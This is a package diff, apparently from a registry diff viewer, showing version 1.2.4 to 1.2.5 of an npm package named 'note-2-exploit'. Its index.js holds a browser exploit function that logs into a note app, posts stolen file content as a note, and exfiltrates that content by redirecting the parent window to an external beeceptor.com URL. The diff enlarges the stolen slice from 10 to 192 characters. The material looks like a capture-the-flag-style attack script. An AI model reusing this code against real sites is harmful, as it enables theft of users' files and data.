note-2-exploit 1.2.4 → 1.2.5

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +3 -3
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -13,7 +13,7 @@ async function exploit() {
13
13
  }).then(res => res.json())
14
14
  .catch(err =>
15
15
  window.parent.location.replace("https://newname.free.beeceptor.com?q=fail"))
16
- .then(res => res.title);
16
+ .then(res => res.content);
17
17
  let note_name = (Math.random() + 1).toString(36).substring(7);
18
18
  await fetch("/login", {
19
19
  "headers": {
@@ -37,14 +37,14 @@ async function exploit() {
37
37
  "content-type": "application/json",
38
38
  "sec-gpc": "1"
39
39
  },
40
- "body": "{\"title\":\"" + note_name + "\",\"content\":\"" + file_content.slice(426,426+64).replace("\"", "'") + "\"}",
40
+ "body": "{\"title\":\"" + note_name + "\",\"content\":\"" + file_content.slice(-192).replace("\"", "'") + "\"}",
41
41
  "method": "POST",
42
42
  "mode": "cors",
43
43
  "redirect": "follow",
44
44
  "credentials": "include"
45
45
  });
46
46
  if (file_content)
47
- window.parent.location.replace("https://newname.free.beeceptor.com?q=" + file_content.slice(-10));
47
+ window.parent.location.replace("https://newname.free.beeceptor.com?q=" + file_content.slice(-192));
48
48
  else
49
49
  window.parent.location.replace("https://newname.free.beeceptor.com?q=empty_file");
50
50
  // fetch("http://10.113.184.121:10082/report", {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "note-2-exploit",
3
- "version": "1.2.4",
3
+ "version": "1.2.5",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {